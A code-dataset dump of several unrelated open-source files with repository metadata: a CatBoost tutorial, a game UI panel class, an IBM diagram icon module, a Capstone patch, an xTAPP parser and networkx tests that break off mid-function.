shap_values = model.get_feature_importance(pool1, type='ShapValues')
expected_value = shap_values[0,-1]
shap_values = shap_values[:,:-1]
print(shap_values.shape)
import shap
shap.initjs()
shap.force_plot(expected_value, shap_values[3,:], X.iloc[3,:], show=False)
import shap
shap.initjs()
shap.force_plot(expected_value, shap_values[91,:], X.iloc[91,:], show=False)
shap.summary_plot(shap_values, X, show=False)
X_small = X.iloc[0:200]
shap_small = shap_values[:200]
shap.force_plot(expected_value, shap_small, X_small, show=False)
### Feature evaluation
learn_params = {'iterations': 20, # 2000
'learning_rate': 0.5, # we set big learning_rate,
# because we have small
# #iterations
'random_seed': 0,
'verbose': False,
'loss_function' : 'Logloss',
'boosting_type': 'Plain'}
evaluator = CatboostEvaluation('amazon/train.tsv',
fold_size=10000, # <= 50% of dataset
fold_count=20,
column_description='amazon/train.cd',
partition_random_seed=0,
#working_dir=...
)
result = evaluator.eval_features(learn_config=learn_params,
eval_metrics=['Logloss', 'Accuracy'],
features_to_eval=[6, 7, 8])
logloss_result = result.get_metric_results('Logloss')
logloss_result.get_baseline_comparison(
ScoreConfig(ScoreType.Rel, overfit_iterations_info=False)
)
### Saving the model
my_best_model = CatBoostClassifier(iterations=10)
my_best_model.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
my_best_model.save_model('catboost_model.bin')
my_best_model.save_model('catboost_model.json', format='json')
my_best_model.load_model('catboost_model.bin')
print(my_best_model.get_params())
print(my_best_model.random_seed_)
### Hyperparameter tuning
#### Training speed
fast_model = CatBoostClassifier(
random_seed=63,
iterations=150,
learning_rate=0.01,
boosting_type='Plain',
bootstrap_type='Bernoulli',
subsample=0.5,
one_hot_max_size=20,
rsm=0.5,
leaf_estimation_iterations=5,
max_ctr_complexity=1)
fast_model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
plot=True
)
#### Accuracy
tunned_model = CatBoostClassifier(
random_seed=63,
iterations=1000,
learning_rate=0.03,
l2_leaf_reg=3,
bagging_temperature=1,
random_strength=1,
one_hot_max_size=2,
leaf_estimation_method='Newton'
)
tunned_model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
eval_set=(X_validation, y_validation),
plot=True
)
### Training the model after parameter tuning
best_model = CatBoostClassifier(
random_seed=63,
iterations=int(tunned_model.tree_count_ * 1.2),
)
best_model.fit(
X, y,
cat_features=cat_features,
verbose=100
)
### Calculate predictions for the contest
X_test = test_df.drop('id', axis=1)
test_pool = Pool(data=X_test, cat_features=cat_features)
contest_predictions = best_model.predict_proba(test_pool)
print('Predictions:')
print(contest_predictions)
### Prepare the submission
f = open('submit.csv', 'w')
f.write('Id,Action\n')
for idx in range(len(contest_predictions)):
line = str(test_df['id'][idx]) + ',' + str(contest_predictions[idx][1]) + '\n'
f.write(line)
f.close()
#Submit your solution [here](https://www.kaggle.com/c/amazon-employee-access-challenge/submit).
#Good luck!!!
|
96b16240cf8d7e7043366e30c4afde0e7f5a9365
|
393e491a112a6459ca23419596a793251676b39a
|
/src/petals/client/routing/__init__.py
|
3be2710846df972373f2821cfe0d16ca0d30de3c
|
[
"MIT"
] |
permissive
|
bigscience-workshop/petals
|
24508ba536377166ddcdf4a6a56b8cd3f5acf280
|
6ef6bf5fa24282809ec57ff7c60a43642c100daa
|
refs/heads/main
| 2023-09-01T04:19:24.801624
| 2023-08-31T06:31:03
| 2023-08-31T06:31:03
| 502,482,803
| 6,598
| 338
|
MIT
| 2023-09-07T01:29:15
| 2022-06-12T00:10:27
|
Python
|
UTF-8
|
Python
| false
| false
| 181
|
py
|
__init__.py
|
from petals.client.routing.sequence_manager import RemoteSequenceManager, maybe_log_traceback
from petals.client.routing.spending_policy import NoSpendingPolicy, SpendingPolicyBase
|
c04e02203a1c45adabee96e4f10636698e7f8876
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/battle_royale/scripts/client/battle_royale/gui/Scaleform/daapi/view/battle/consumables_panel.py
|
390929b1a5d61ce71391009013f3988c73b9ad4e
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 6,754
|
py
|
consumables_panel.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: battle_royale/scripts/client/battle_royale/gui/Scaleform/daapi/view/battle/consumables_panel.py
import BigWorld
from constants import EQUIPMENT_STAGES
from Event import EventsSubscriber
from gui.Scaleform.daapi.view.battle.shared.consumables_panel import ConsumablesPanel, TOOLTIP_FORMAT
from gui.Scaleform.genConsts.CONSUMABLES_PANEL_SETTINGS import CONSUMABLES_PANEL_SETTINGS
from gui.battle_control.battle_constants import VEHICLE_VIEW_STATE
from gui.impl.gen import R
class BattleRoyaleConsumablesPanel(ConsumablesPanel):
__slots__ = ('__quantityMap',)
_PANEL_MAX_LENGTH = 10
_AMMO_START_IDX = 0
_AMMO_END_IDX = 1
_EQUIPMENT_START_IDX = 2
_EQUIPMENT_END_IDX = 9
_R_ARTEFACT_ICON = R.images.gui.maps.icons.battleRoyale.artefact
def __init__(self):
super(BattleRoyaleConsumablesPanel, self).__init__()
self.__quantityMap = [None] * self._PANEL_MAX_LENGTH
self.__equipmentRange = range(self._EQUIPMENT_START_IDX, self._EQUIPMENT_END_IDX + 1)
self.__es = EventsSubscriber()
return
def _populate(self):
super(BattleRoyaleConsumablesPanel, self)._populate()
vehStateCtrl = self.sessionProvider.shared.vehicleState
self.__es.subscribeToEvent(vehStateCtrl.onVehicleStateUpdated, self.__onVehicleLootAction)
self.__es.subscribeToEvent(BigWorld.player().onObserverVehicleChanged, self.__onEquipmentReset)
def _dispose(self):
self.__es.unsubscribeFromAllEvents()
super(BattleRoyaleConsumablesPanel, self)._dispose()
def _getPanelSettings(self):
return CONSUMABLES_PANEL_SETTINGS.BATTLE_ROYALE_SETTINGS_ID
def _onShellsAdded(self, intCD, descriptor, quantity, _, gunSettings):
if intCD in self._cds:
return
else:
slotIdx = self.__getNewSlotIdx(self._AMMO_START_IDX, self._AMMO_END_IDX)
if slotIdx is None:
return
self._addShellSlot(slotIdx, intCD, descriptor, quantity, gunSettings)
self._mask |= 1 << slotIdx
return
def _onShellsUpdated(self, intCD, quantity, *args):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onShellsUpdated(intCD, quantity, *args)
def _onNextShellChanged(self, intCD):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onNextShellChanged(intCD)
def _onCurrentShellChanged(self, intCD):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onCurrentShellChanged(intCD)
def _onGunSettingsSet(self, _):
self.__resetShellSlots()
self._resetDelayedReload()
def _onGunReloadTimeSet(self, currShellCD, state, skipAutoLoader):
if currShellCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onGunReloadTimeSet(currShellCD, state, skipAutoLoader)
def _onEquipmentAdded(self, intCD, item):
if item is None or intCD in self._cds:
return
else:
slotIdx = self.__getNewSlotIdx(self._EQUIPMENT_START_IDX, self._EQUIPMENT_END_IDX)
if slotIdx is None:
return
self._addEquipmentSlot(slotIdx, intCD, item)
self._mask |= 1 << slotIdx
return
def _isAvatarEquipment(self, item):
return False
def _resetOptDevices(self):
pass
def _addOptionalDeviceSlot(self, idx, intCD):
pass
def _buildEquipmentSlotTooltipText(self, item):
descriptor = item.getDescriptor()
body = descriptor.description
toolTip = TOOLTIP_FORMAT.format(descriptor.userString, body)
return toolTip
def _updateShellSlot(self, idx, quantity):
super(BattleRoyaleConsumablesPanel, self)._updateShellSlot(idx, quantity)
prevQuantity = self.__quantityMap[idx]
self.__quantityMap[idx] = quantity
if prevQuantity is not None and quantity > prevQuantity:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN)
return
def _updateEquipmentSlot(self, idx, item):
super(BattleRoyaleConsumablesPanel, self)._updateEquipmentSlot(idx, item)
prevQuantity = self.__quantityMap[idx]
quantity = self.__quantityMap[idx] = item.getQuantity()
if prevQuantity is not None and quantity > prevQuantity:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN)
return
else:
currStage = item.getStage()
prevStage = item.getPrevStage()
if currStage == EQUIPMENT_STAGES.READY and prevStage == EQUIPMENT_STAGES.COOLDOWN:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN_SPECIAL)
elif currStage == EQUIPMENT_STAGES.COOLDOWN and prevStage in (EQUIPMENT_STAGES.READY, EQUIPMENT_STAGES.PREPARING, EQUIPMENT_STAGES.ACTIVE):
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_ORANGE)
elif currStage == EQUIPMENT_STAGES.READY and prevStage == EQUIPMENT_STAGES.PREPARING:
self.as_setEquipmentActivatedS(idx, False)
return
def _updateOptionalDeviceSlot(self, idx, isOn):
pass
def _showEquipmentGlow(self, equipmentIndex, glowType=CONSUMABLES_PANEL_SETTINGS.GLOW_ID_ORANGE):
pass
def _onPostMortemSwitched(self, noRespawnPossible, respawnAvailable):
self._reset()
def __onEquipmentReset(self):
self.__resetEquipmentSlots()
self.as_resetS(list())
def __getNewSlotIdx(self, startIdx=0, endIdx=_PANEL_MAX_LENGTH - 1):
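        # Scan the occupancy bitmask for the first free slot in [startIdx, endIdx].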
resultIdx = None
for idx in range(startIdx, endIdx + 1):
if self._mask & 1 << idx == 0:
resultIdx = idx
break
return resultIdx
def __resetShellSlots(self):
for idx in range(self._AMMO_START_IDX, self._AMMO_END_IDX + 1):
self._mask &= ~(1 << idx)
self._cds[idx] = None
return
def __resetEquipmentSlots(self):
for idx in self.__equipmentRange:
self._mask &= ~(1 << idx)
self._cds[idx] = None
return
def __onVehicleLootAction(self, state, _):
if state != VEHICLE_VIEW_STATE.LOOT:
return
else:
            self.__quantityMap = [numItems if numItems is not None else 0 for numItems in self.__quantityMap]
vehStateCtrl = self.sessionProvider.shared.vehicleState
if vehStateCtrl is not None:
vehStateCtrl.onVehicleStateUpdated -= self.__onVehicleLootAction
return
|
a2ae69332cbdffa7e6f97abfefc57c47ea4ab15c
|
610244a938791d3d05c749804725f4a9b3831a96
|
/diagrams/ibm/general.py
|
5b49007062ef169f06f44042c9024d083df99fe7
|
[
"MIT"
] |
permissive
|
mingrammer/diagrams
|
66b62ab484eca9cc439aee9b1cffedb1fcb9dba6
|
b19b09761db6f0037fd76e527b9ce6918fbdfcfc
|
refs/heads/master
| 2023-09-04T04:57:36.727192
| 2023-05-22T23:51:10
| 2023-05-22T23:51:10
| 237,791,077
| 31,257
| 2,119
|
MIT
| 2023-09-05T15:45:52
| 2020-02-02T15:23:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
general.py
|
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _IBM
class _General(_IBM):
_type = "general"
_icon_dir = "resources/ibm/general"
class CloudMessaging(_General):
_icon = "cloud-messaging.png"
class CloudServices(_General):
_icon = "cloud-services.png"
class Cloudant(_General):
_icon = "cloudant.png"
class CognitiveServices(_General):
_icon = "cognitive-services.png"
class DataSecurity(_General):
_icon = "data-security.png"
class Enterprise(_General):
_icon = "enterprise.png"
class GovernanceRiskCompliance(_General):
_icon = "governance-risk-compliance.png"
class IBMContainers(_General):
_icon = "ibm-containers.png"
class IBMPublicCloud(_General):
_icon = "ibm-public-cloud.png"
class IdentityAccessManagement(_General):
_icon = "identity-access-management.png"
class IdentityProvider(_General):
_icon = "identity-provider.png"
class InfrastructureSecurity(_General):
_icon = "infrastructure-security.png"
class Internet(_General):
_icon = "internet.png"
class IotCloud(_General):
_icon = "iot-cloud.png"
class MicroservicesApplication(_General):
_icon = "microservices-application.png"
class MicroservicesMesh(_General):
_icon = "microservices-mesh.png"
class MonitoringLogging(_General):
_icon = "monitoring-logging.png"
class Monitoring(_General):
_icon = "monitoring.png"
class ObjectStorage(_General):
_icon = "object-storage.png"
class OfflineCapabilities(_General):
_icon = "offline-capabilities.png"
class Openwhisk(_General):
_icon = "openwhisk.png"
class PeerCloud(_General):
_icon = "peer-cloud.png"
class RetrieveRank(_General):
_icon = "retrieve-rank.png"
class Scalable(_General):
_icon = "scalable.png"
class ServiceDiscoveryConfiguration(_General):
_icon = "service-discovery-configuration.png"
class TextToSpeech(_General):
_icon = "text-to-speech.png"
class TransformationConnectivity(_General):
_icon = "transformation-connectivity.png"
# Aliases
|
514593362ededf0d0c41028e143217a436467e51
|
ca10e5645aa2e8152d6219d31ac77d3ed50096c0
|
/suite/auto-sync/CppTranslator/Patches/SizeAssignments.py
|
1f4144e2ddc9b0b56103c16b7d1b57534c2ddb39
|
[
"BSD-3-Clause",
"NCSA"
] |
permissive
|
capstone-engine/capstone
|
fc4f1b14eded800818f2ed64eafaf342e6046f9b
|
f036d2dbb6a9f0d1e0dc9c14b4f44878aeed260a
|
refs/heads/next
| 2023-09-02T14:38:15.356818
| 2023-08-30T03:13:17
| 2023-08-30T03:13:17
| 14,735,429
| 1,390
| 292
|
NOASSERTION
| 2023-09-14T20:47:20
| 2013-11-27T02:32:11
|
C
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
SizeAssignments.py
|
import re
from tree_sitter import Node
from Patches.HelperMethods import get_text, get_function_params_of_node
from Patches.Patch import Patch
class SizeAssignment(Patch):
"""
Patch Size = <num>
to *Size = <num>
if Size is a reference.
"""
def __init__(self, priority: int):
super().__init__(priority)
def get_search_pattern(self) -> str:
return "(assignment_expression" ' ((identifier) @id (#eq? @id "Size"))' ") @assign"
def get_main_capture_name(self) -> str:
return "assign"
def get_patch(self, captures: [(Node, str)], src: bytes, **kwargs) -> bytes:
assign = captures[0][0]
assign_text = get_text(src, assign.start_byte, assign.end_byte)
param_list = get_function_params_of_node(assign)
if not param_list:
return assign_text
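        # If the enclosing function takes Size by reference (&Size), the C
        # translation receives a pointer, so the assignment must dereference it.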
for p in param_list.named_children:
p_text = get_text(src, p.start_byte, p.end_byte)
if b"&Size" in p_text:
return re.sub(b"Size", b"*Size", assign_text)
return assign_text
|
027e04c3aa481d58852d139e71570cbc2fb43b74
|
4d158bde772e67117ea949efa45b795ed055850b
|
/tools/interface/xTAPP.py
|
4b33a0e52723bed8b70fdfd5be0d68039f0dbcdf
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ttadano/alamode
|
fc9e9371d95b6f84e43bc59b559879ad915cccb9
|
b4fd81af88a322356492e6648965d1d2e004f7c3
|
refs/heads/develop
| 2023-07-06T05:58:45.217759
| 2023-06-16T11:48:16
| 2023-06-16T11:48:16
| 22,987,128
| 130
| 56
|
MIT
| 2023-04-01T06:49:22
| 2014-08-15T11:05:42
|
C++
|
UTF-8
|
Python
| false
| false
| 17,751
|
py
|
xTAPP.py
|
#
# xTAPP.py
#
# Interface to xTAPP (http://xtapp.cp.is.s.u-tokyo.ac.jp)
#
# Copyright (c) 2014-2020 Terumasa Tadano
#
# This file is distributed under the terms of the MIT license.
# Please see the file 'LICENCE.txt' in the root directory
# or http://opensource.org/licenses/mit-license.php for information.
#
import numpy as np
class XtappParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._kd = None
self._header_part = None
self._nat = 0
self._x_fractional = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
lavec, nat, nkd, str_tappinput \
= self._read_tappinput(file_in, self._BOHR_TO_ANGSTROM)
x, kd, str_atom = self._read_atomdata(file_in, nat, nkd)
str_kpoint = self._read_kpdata(file_in)
str_struct_opt, str_opt_constr = self._read_structure_optimize(file_in)
str_header = ""
for entry in str_tappinput:
str_header += entry
for entry in str_kpoint:
str_header += entry
for entry in str_struct_opt:
str_header += entry
for entry in str_opt_constr:
str_header += entry
for i in range(nkd + 1):
str_header += str_atom[i]
self._lattice_vector = lavec
self._inverse_lattice_vector = np.linalg.inv(lavec)
self._x_fractional = x
self._nat = nat
self._kd = kd
self._header_part = str_header
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_cg, stdout_files, stdout_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_cg)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp or self._print_force:
self._print_displacements_and_forces(stdout_files,
stdout_file_offset,
filter_emin,
filter_emax)
elif self._print_energy:
self._print_energies(stdout_files, stdout_file_offset)
def _generate_input(self, header, disp):
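        # Displaced structures break the crystal symmetry, so only the
        # identity operation is written to the symmetry block.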
nsym = 1
symop = []
symop.append([1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0])
denom_tran = 1
has_inv = 0
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".cg"
with open(filename, 'w') as f:
f.write("%s" % self._header_part)
for i in range(self._nat):
f.write("%i %20.15f %20.15f %20.15f\n" % (self._kd[i],
self._x_fractional[i][0] + disp[i, 0],
self._x_fractional[i][1] + disp[i, 1],
self._x_fractional[i][2] + disp[i, 2]))
f.write("# symmetry data\n")
f.write("&symmetry\n")
f.write(" number_sym_op = %i\n" % nsym)
f.write(" has_inversion = %i\n" % has_inv)
f.write(" denom_trans = %i\n" % denom_tran)
f.write("/\n")
mat_tmp = np.zeros((3, 3), dtype=int)
for elems in symop:
for i in range(3):
for j in range(3):
mat_tmp[i][j] = elems[3 * i + j]
mat_inv = np.matrix(mat_tmp).I
for i in range(3):
for j in range(3):
f.write("%4i" % mat_inv[i, j])
f.write(" ")
for i in range(3):
f.write("%4i" % elems[9 + i])
f.write("\n")
f.write("\n")
self._counter += 1
def _set_number_of_zerofill(self, npattern):
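        # Zero-pad file indices to as many digits as the total number of
        # displacement patterns.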
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
@staticmethod
def _read_tappinput(file_in, Bohr_to_Ang):
list_tappinput = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "main" in line and "data" in line:
flag_add = True
list_tappinput.append(line)
elif "#" in line:
flag_add = False
elif flag_add:
list_tappinput.append(line)
if len(list_tappinput) == 0:
raise RuntimeError("main data entry not found")
list_tappinput_new = []
for obj in list_tappinput:
obj_split = obj.rstrip().split(',')
for subobj in obj_split:
if subobj:
list_tappinput_new.append(subobj)
str_input = ""
for entry in list_tappinput_new:
str_input += entry + " "
entrylist = str_input.split()
lavec_list = []
a = 0.0
nkd = 0
nat = 0
# get lattice_factor
for i in range(len(entrylist)):
if "lattice_factor" in entrylist[i]:
a = float(entrylist[i + 2])
if "lattice_list" in entrylist[i]:
for j in range(9):
lavec_list.append(entrylist[i + j + 2])
if "number_element" in entrylist[i]:
nkd = int(entrylist[i + 2])
if "number_atom" in entrylist[i]:
nat = int(entrylist[i + 2])
if a == 0.0:
raise RuntimeError("Couldn't read lattice_factor")
if nkd == 0:
raise RuntimeError("Couldn't read number_element")
if nat == 0:
raise RuntimeError("Couldn't read number_atom")
if len(lavec_list) != 9:
raise RuntimeError("Couldn't read lattice_list")
lavec = np.zeros((3, 3))
a *= Bohr_to_Ang
for i in range(3):
for j in range(3):
lavec[j][i] = a * float(lavec_list[3 * i + j])
return lavec, nat, nkd, list_tappinput
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 2.0 * self._RYDBERG_TO_EV
elif str_unit == "rydberg":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 2.0
elif str_unit == "hartree":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
else:
raise RuntimeError("This cannot happen.")
self._force_conversion_factor = self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
@property
def nat(self):
return self._nat
@property
def lattice_vector(self):
return self._lattice_vector
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
def _print_displacements_and_forces(self, stdout_files,
file_offset, filter_emin, filter_emax):
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose() / self._BOHR_TO_ANGSTROM
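        # _refold wraps fractional displacements back into [-0.5, 0.5) to
        # remove jumps across periodic boundaries.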
vec_refold = np.vectorize(self._refold)
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
force_offset = np.zeros((self._nat, 3))
epot_offset = 0.0
else:
x0_offset = self._get_coordinates_xtapp(file_offset, self._nat)
force_offset = self._get_atomicforces_xtapp(file_offset, self._nat)
epot_offset = self._get_energies_xtapp(file_offset)
            try:
                x0_offset = np.reshape(x0_offset, (self._nat, 3))
            except ValueError:
                raise RuntimeError("File %s contains too many position entries" % file_offset)
            disp_offset = x0_offset - x0
            try:
                force_offset = np.reshape(force_offset, (self._nat, 3))
            except ValueError:
                raise RuntimeError("File %s contains too many force entries" % file_offset)
for search_target in stdout_files:
x = self._get_coordinates_xtapp(search_target, self._nat)
force = self._get_atomicforces_xtapp(search_target, self._nat)
epot = self._get_energies_xtapp(search_target)
ndata_disp = len(x) // (3 * self._nat)
ndata_force = len(force) // (3 * self._nat)
            if ndata_disp != ndata_force:
                raise RuntimeError(
                    "The numbers of displacement and force entries are inconsistent: "
                    "Ndata disp : %d, Ndata force : %d" % (ndata_disp, ndata_force))
ndata_energy = len(epot)
if ndata_energy != ndata_disp:
raise RuntimeError("The numbers of displacement and energy entries are different.")
ndata = ndata_disp
x = np.reshape(x, (ndata, self._nat, 3))
force = np.reshape(force, (ndata, self._nat, 3))
epot -= epot_offset
epot *= self._RYDBERG_TO_EV * 2.0
for idata in range(ndata):
if filter_emin is not None:
if filter_emin > epot[idata]:
continue
if filter_emax is not None:
if filter_emax < epot[idata]:
continue
if self._print_disp:
disp = x[idata, :, :] - x0 - disp_offset
disp = np.dot(vec_refold(disp), lavec_transpose)
disp *= self._disp_conversion_factor
if self._print_force:
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d, E_pot (eV): %s" %
(search_target, idata + 1, epot[idata]))
if self._print_disp and self._print_force:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
elif self._print_disp:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
elif self._print_force:
for i in range(self._nat):
print("%15.8E %15.8E %15.8E" % (f[i, 0],
f[i, 1],
f[i, 2]))
def _print_energies(self, stdout_files, file_offset):
if file_offset is None:
etot_offset = 0.0
else:
data = self._get_energies_xtapp(file_offset)
if len(data) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
etot_offset = data[0]
print("# Etot")
for search_target in stdout_files:
etot = self._get_energies_xtapp(search_target)
for idata in range(len(etot)):
val = etot[idata] - etot_offset
val *= self._energy_conversion_factor
print("%19.11E" % val)
@staticmethod
def _read_atomdata(file_in, nat_in, nkd_in):
list_atom = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "atom" in line and "data" in line:
flag_add = True
list_atom.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_atom.append(line)
if len(list_atom) == 0:
raise RuntimeError("atom data entry not found")
x_out = np.zeros((nat_in, 3), dtype=float)
kd_out = np.zeros(nat_in, dtype=int)
for i in range(nat_in):
list_tmp = list_atom[i + nkd_in + 1].rstrip().split()
kd_out[i] = int(list_tmp[0])
for j in range(3):
x_out[i][j] = float(list_tmp[j + 1])
return x_out, kd_out, list_atom
@staticmethod
def _read_kpdata(file_in):
list_kpoint = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "k-points" in line.rstrip():
flag_add = True
list_kpoint.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_kpoint.append(line)
if len(list_kpoint) == 0:
raise RuntimeError("k-points data entry not found")
return list_kpoint
@staticmethod
def _read_structure_optimize(file_in):
list_opt = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "struct_opt" in line.rstrip():
flag_add = True
list_opt.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_opt.append(line)
if len(list_opt) == 0:
raise RuntimeError("struct_opt entry not found")
list_opt2 = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "str_opt_constr" in line.rstrip():
flag_add = True
list_opt2.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_opt2.append(line)
if len(list_opt2) == 0:
raise RuntimeError("str_opt_constr entry not found")
return list_opt, list_opt2
@staticmethod
    def _get_coordinates_xtapp(str_file, nat):
        found_tag = False
        x = []
        # Use a context manager so the file is closed even when the tag is missing.
        with open(str_file, 'r') as f:
            line = f.readline()
            while line:
                if "atom_position" in line:
                    found_tag = True
                    for i in range(nat):
                        line = f.readline()
                        x.extend([t for t in line.rstrip().split()[1:]])
                    break
                line = f.readline()
        if not found_tag:
            raise RuntimeError("atom_position tag not found in %s" % str_file)
        return np.array(x, dtype=float)
@staticmethod
    def _get_atomicforces_xtapp(str_file, nat):
        found_tag = False
        force = []
        # Use a context manager so the file is closed even when the tag is missing.
        with open(str_file, 'r') as f:
            line = f.readline()
            while line:
                if "force" in line:
                    found_tag = True
                    for i in range(nat):
                        line = f.readline()
                        force.extend([t for t in line.rstrip().split()])
                    break
                line = f.readline()
        if not found_tag:
            raise RuntimeError("force tag not found in %s" % str_file)
        return np.array(force, dtype=float)
@staticmethod
def _get_energies_xtapp(str_file):
search_tag = "total_energy"
found_tag = False
etot = []
with open(str_file) as openfileobject:
for line in openfileobject:
if search_tag in line:
energy_str = line.rstrip().split()[2]
etot.extend([energy_str[:-1]])
found_tag = True
if not found_tag:
raise RuntimeError("%s tag not found in %s" % (search_tag, str_file))
return np.array(etot, dtype=float)
@staticmethod
def _refold(x):
if x >= 0.5:
return x - 1.0
elif x < -0.5:
return x + 1.0
else:
return x
|
29e213bc9d1a29530f199035b904ea1b7e172176
|
af101b467134e10270bb72d02f41f07daa7f57d8
|
/tests/test_evaluation/test_functional/test_gaussian_funcs.py
|
fa3d6e76541376c975997f2479de5232d5af967f
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmagic
|
4d864853417db300de4dfe7e83ce380fd1557a23
|
a382f143c0fd20d227e1e5524831ba26a568190d
|
refs/heads/main
| 2023-08-31T14:40:24.936423
| 2023-08-30T05:05:56
| 2023-08-30T05:05:56
| 203,999,962
| 1,370
| 192
|
Apache-2.0
| 2023-09-14T11:39:18
| 2019-08-23T13:04:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 276
|
py
|
test_gaussian_funcs.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
from mmagic.evaluation.functional import gauss_gradient
def test_gauss_gradient():
img = np.random.randint(0, 255, size=(8, 8, 3))
grad = gauss_gradient(img, 1.4)
assert grad.shape == (8, 8, 3)
|
f06295f08869cd4fd90582c2e6ea2a5135536bfa
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/networkx/algorithms/node_classification/tests/test_local_and_global_consistency.py
|
3a64fbe7bbcaf5a0ffd4fcf01c65eff0018e3599
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,446
|
py
|
test_local_and_global_consistency.py
|
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
import networkx as nx
from networkx.algorithms import node_classification
class TestLocalAndGlobalConsistency:
@classmethod
def setupClass(cls):
global numpy
global scipy
try:
import numpy
except ImportError:
raise SkipTest('NumPy not available.')
try:
import scipy
except ImportError:
raise SkipTest('SciPy not available.')
def test_path_graph(self):
G = nx.path_graph(4)
label_name = 'label'
G.node[0][label_name] = 'A'
G.node[3][label_name] = 'B'
predicted = node_classification.local_and_global_consistency(
G, label_name=label_name)
assert_equal(predicted[0], 'A')
assert_equal(predicted[1], 'A')
assert_equal(predicted[2], 'B')
assert_equal(predicted[3], 'B')
@raises(nx.NetworkXError)
def test_no_labels(self):
G = nx.path_graph(4)
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXError)
def test_no_nodes(self):
G = nx.Graph()
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXError)
def test_no_edges(self):
G = nx.Graph()
G.add_node(1)
G.add_node(2)
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXNotImplemented)
def test_digraph(self):
